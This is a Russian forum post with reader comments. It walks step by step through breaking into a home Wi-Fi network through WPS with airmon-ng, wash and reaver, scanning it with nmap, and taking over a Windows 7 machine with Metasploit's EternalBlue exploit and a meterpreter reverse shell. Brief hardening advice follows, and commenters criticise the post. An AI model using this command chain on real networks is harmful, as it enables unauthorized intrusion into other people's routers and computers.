В связи с усилением киберугроз меня попросили проверить на информационную безопасность одну систему.
В данном посте я наглядно покажу, насколько вы уязвимы и дам рекомендации, как избежать проникновения в ваш компьютер.
Все написанное ниже носит информационный характер с целью повышения компьютерной грамотности населения не оскорбляя чувств верующих и помним что ИГИЛ и Хайат Тахрир аш-Шам запрещенные в России террористические организации.
0
Проникать в сеть тестируемого мы будем, через сеть wi-fi.
Практически все из вас используют домашние wi-fi роутеры, конечно это удобно, но и открывает возможности, для злоумышленников.
Сперва нам необходимо узнать, как называется наша беспроводная сетевая карта, для этого вводим команду
# ifconfig
Видим 3 интерфейса - проводной, лупбэк и наш искомый беспроводной wlan0
0
Теперь, когда мы выяснили название своего беспроводного интерфейса, необходимо перевести его в режим мониторинга.
# airmon-ng check kill - убиваем процессы висящие на интерфейсе
# airmon-ng start wlan0 - переводим интерфейс в режим мониторинга
В итоге у нас появится интерфейс wlan0mon
0
Посмотрим, что у нас творится в эфире
# wash -i wlan0mon
Мы с вами видим, что у нас есть 5 точек доступа wi-fi поблизости.
Получаем MAC-адрес точки доступа, канал, силу сигнала, статус wps, производителя беспроводного чипа и имя точки, в данном случае нас интересует столбец Lck.
Как видим у большинства WPS не отключен, была придумана данная технология, для облегчения жизни простых пользователей, для быстрого подключения устройств по пин-коду, но на практике дома ни кто этим не пользуется и ни кто как правило ее не отключает, а зря т.к. она действительно облегчила жизнь но другим нехорошим человекам.
0
Мы с вами воспользуемся этой уязвимостью WPS, узнаем пин-код и через него пароль, для wi-fi сети.
# reaver -i wlan0mon -b <MAC-адрес точки wi-fi> -K
В итоге мы с вами благополучно получили WPS pin: <*****>
0
Добавляем к команде наш пин-код и через 30 сек получаем пароль от wi-fi - WPA PSK: <******>
# reaver -i wlan0mon -b <MAC-адрес точки wi-fi> -p <Пин-код>
0
Теперь мы можем спокойно подключиться к wi-fi сети и посмотреть, что в ней имеется.
Видим, что мы получили по dhcp ip-адресс 192.168.0.102, а сеть у нас 192.168.0.0/24
# nmap -sn 192.168.0.0/24
В сети у нас 3 устройства:
192.168.0.1 - wi-fi router TP-Link, кстати логин/пароль были стандартные admin/admin
192.168.0.112 - Компьютер тестируемого
192.168.0.102 - это мы
Посмотрим, какие службы запущены на компьютере:
# nmap 192.168.0.112
0
На компьютере открыты стандартные порты расшарок, smb. Установлена Windows 7
Многие наверное слышали про уязвимости, через которые в наши компьютеры проникали сотрудники АНБ, позже через эти дыры компьютеры по всему миру заразились вирусом-шифровальщиков WannaCry, а позже и Petya.
Хоть сейчас на дворе уже 2019 год, у многих дома стоят пиратские версии Windows, которые до сих пор не пропатчены из-за боязни что "слетит" активация или просто изза беспечности и пофигизма.
На скриншоте выше мы видим, что у нас есть 1902 варианта поиметь несчастный компьютер.
Запускаем Metasploit
# msfconsole
0
Выбираем наш эксплоит от АНБ - EthernalBlue
# use exploit/windows/smb/ms17_010_eternalblue
Указываем ip-адресс проверямого
# set RHOST 192.168.0.112
Указываем свой ip-адресс
# set LHOST 192.168.0.102
Указываем рабочую нагрузку
# set payload windows/meterpreter/reverse_tcp
Процесс в который будем внедряться
# set processinject lsass.exe
Запускаем эксплоит, мы в системе с полными правами, делаем что хотим.
# exploit
Рекомендации, как защитится от этого:
1. Прошить свой wi-fi роутер последней прошивкой., если она не обновляется на сайте, купить новый роутер
2. Отключить WPS на роутере, вы таким образом закроете потенциальную дыру, которой вы все равно не пользуетесь.
3. Установить сложные пароли: минимум 10 символов включающие в себя цифры, буквы в разном регистре и спецсимволы.
4. Своевременно обновлять операционную систему и пользоваться лицензионным ПО.
5. Установить лицензионное комплексное программное обеспечение включающее в себя антивирус/межсетевой экран/систему предотвращения вторжений или превентивную защиту.
Отвечу на ваши вопросы, если они появятся в комментариях к посту.
Практически все из вас используют домашние wi-fi роутеры - сроду не пользовался вафлей, судя по отзывам с нее нормально фильмы больше 4 гигов не качаются без обрыва архива
Ну коли так, примите мои извинения. Статья реально хороша, плюсик поставил, хотел даже потестить, но у меня все роутеры под OpenWrt. Обычно тут авторских хороших статей почти нет, а если есть - мало что до топа доходит. Я года 3 назад завязал писать. Времени много уходит, а говницом обольют. Публикуйте и на Хабре:)
О чем статья то? О использовании Kali linux? Без объяснения, без теоретической части, тупо - клацаем кнопки. Аффтар, ты бы хотя бы на пальцах попробовал бы описать уязвимость WPS протокола, там для понимания механизма, достаточно пары абзацев добавить! И статья получилась бы информативней и интересней и ты свою компетенцию продемонстрировал бы! А так - чтиво г-но, которое 90% пользователей "фишек" не поймут, в силу отсутствия спецефических знаний. А тем, к то в теме - читать не интересно, по вышеуказанным причинам. Минус.
Начнем с того что это не тестирование системы на безопасность, а именно проникновение или получение несанкционированного доступа. Тестирование имеет целью выявить уязвимые места системы (даже потенциальные) с целью их устранения или мониторинга, а не количество готовых эксплойтов для проникновения.
Насчет аудитории, если это расчитано на простого обывателя не знакомого с темой в деталях, то слишком много опущено и недосказано, а для человека знакомого с темой и использующего тот же nmap регулярно - ничего особенно нового.
В общем - ни-а-чьо-ом.
И в завершение: абсолютно безопасных систем нет.
первая рекомендация любого безопасника, это своевременное накатывание патчей на защищаемую систему
потом уже защищаться сетевыми экранами и прочей фигней
Согласен, нарушил последовательность. Сперва в песочницу, потом сделать резервную копию на ленту или снапшот, потом патчи на продакшн. А лучше вообще выключить сервер и пойти спать. :)
я один раз вирус какой то подхватил который систему нагружал все проц до 90 градусов грелся мать плата тоже так что они уже микропрограмно все это делают пришлось с нуля винду переустанавливать снес старую под чистую после этого проблема решилась .
Потратил на пару минут больше времени и завёл "Белый список" на Wi-Fi", благо все современные роутеры это позволяют. Т.е. устройство которого нет в списке физически не сможет подключиться. Зачем столько высшей математики???
waidps + анализ тоже никто не отменял ;)
При желание, можно задействовать некий механизм предотвращения вторжений (IPS).
Устройство с mac адрес таким то, появилось в сети когда я на работе. Повышается мощность до 1 ватта и запускается механизм вроде auto contain. Доступ не получен...
Согласен.
Встраивать механизмы активного противодействия в домашние никто не будет.
Потребуется проведение анализа (написание ПО + увлечение объема прошивки ), независимый радио модуль с антеннами. Да и 1 ватт wifi как бы нарушение :)
а теперь тоже самое но по русски
Практически все из вас используют домашние wi-fi роутеры - сроду не пользовался вафлей, судя по отзывам с нее нормально фильмы больше 4 гигов не качаются без обрыва архива
Интресно, а кому нах надо взламывать мой комп?
Автосканерам, для включения вашего компа в зомби-сеть, для ddos-атак или майнинга криптовалют
Ага. Через домашний вай-фай))) вы сами читали что там написано?
Я правильно понял что используется Kali Linux?
Используется специальная сборка АНБ - analscream называется
Идите на Хабр с этим, тут какбэ 70% комментариев: "я них.я не понял".
Так с Хабра и стырено:)
Все полностью моё, посмотрите на даты в скринах, в среду сделала и сразу сюда выложила. Так что не пистите месье.
Ну коли так, примите мои извинения. Статья реально хороша, плюсик поставил, хотел даже потестить, но у меня все роутеры под OpenWrt. Обычно тут авторских хороших статей почти нет, а если есть - мало что до топа доходит. Я года 3 назад завязал писать. Времени много уходит, а говницом обольют. Публикуйте и на Хабре:)
Статья прекрасна, но то, что зайдет на хабре и sql.ru - тут не оценят, скорее всего
Проверил, у меня WPA2-чтото там еще) спс. Соседей проверять лень, от вайфая сижу, надо шнур тащить
В данной статье идет проникновение, через WPS и тут не играет роли какой WPA.
корень_собака_анальный_крем
Не крем, а крик
можно и крик) я просто думал, что читается как "anal`s_cream"
ну и фантазия у вас!
Скрыть сеть чтоб интереса меньше было.
Заинтригован.
О каком девайсе идет речь ?
и включеный впс сразу покажет, не нужно заходить на роутер ненужный )))
ну на офф сайте там есть коробочка.
Такое решение будет гораздо дешевле
Из железа только внешний адаптер и bluetooth клавиатура.
Если ты не в сети значит ты ничего не знаешь о сети.
Если есть бекдор тогда норм. А так только шпиенское оборудование.
правильная команда: iwconfig
далее читать не стал..
правильная команда: iwconfig | grep wlan
ваша команда выводит много лишней инфы, дальше читать не стала..
После ifconfig не стал читать. Информация о сетевом интерфейсе беспроводной сети получается командой iwconfig
Интересное в этом посте было только одно: "root@analscream" ))) Спасибо, посмеялся.
О чем статья то? О использовании Kali linux? Без объяснения, без теоретической части, тупо - клацаем кнопки. Аффтар, ты бы хотя бы на пальцах попробовал бы описать уязвимость WPS протокола, там для понимания механизма, достаточно пары абзацев добавить! И статья получилась бы информативней и интересней и ты свою компетенцию продемонстрировал бы! А так - чтиво г-но, которое 90% пользователей "фишек" не поймут, в силу отсутствия спецефических знаний. А тем, к то в теме - читать не интересно, по вышеуказанным причинам. Минус.
Что это было?!
Начнем с того что это не тестирование системы на безопасность, а именно проникновение или получение несанкционированного доступа. Тестирование имеет целью выявить уязвимые места системы (даже потенциальные) с целью их устранения или мониторинга, а не количество готовых эксплойтов для проникновения.
Насчет аудитории, если это расчитано на простого обывателя не знакомого с темой в деталях, то слишком много опущено и недосказано, а для человека знакомого с темой и использующего тот же nmap регулярно - ничего особенно нового.
В общем - ни-а-чьо-ом.
И в завершение: абсолютно безопасных систем нет.
первая рекомендация любого безопасника, это своевременное накатывание патчей на защищаемую систему
потом уже защищаться сетевыми экранами и прочей фигней
А как же вторая рекомендация безопасника?
Никогда не накатывать обновления на основную систему, сначала требуется поиграть в песочнице.
Согласен, нарушил последовательность. Сперва в песочницу, потом сделать резервную копию на ленту или снапшот, потом патчи на продакшн. А лучше вообще выключить сервер и пойти спать. :)
я один раз вирус какой то подхватил который систему нагружал все проц до 90 градусов грелся мать плата тоже так что они уже микропрограмно все это делают пришлось с нуля винду переустанавливать снес старую под чистую после этого проблема решилась .
Антивирус на компьютере стоял?
стоял она их обходила, меня удивило то как нагревались комплектующие.
Куча шума про старый WPA, но позвольте господа! Помнится WPA2 так же давно сломан - разве нет?
Не совсем - была найдена уязвимость если в Wi-Fi сети использованы протоколы шифрования WPA-TKIP или GCMP вместо AES-CCMP
Потратил на пару минут больше времени и завёл "Белый список" на Wi-Fi", благо все современные роутеры это позволяют. Т.е. устройство которого нет в списке физически не сможет подключиться. Зачем столько высшей математики???
waidps + анализ тоже никто не отменял ;)
При желание, можно задействовать некий механизм предотвращения вторжений (IPS).
Устройство с mac адрес таким то, появилось в сети когда я на работе. Повышается мощность до 1 ватта и запускается механизм вроде auto contain. Доступ не получен...
Речь идет про дешевые домашние роутеры, в которых нет такого функционала, цель поста для "крутых сисадминов" я уже написала ниже.
Защита фреймов MFP есть в keenetic и проч. бытовых девайсах. При отключенном WPS, это очень затруднит перехват пароля.
Я про "IPS и повышение мощности до 1 ватта"
Согласен.
Встраивать механизмы активного противодействия в домашние никто не будет.
Потребуется проведение анализа (написание ПО + увлечение объема прошивки ), независимый радио модуль с антеннами. Да и 1 ватт wifi как бы нарушение :)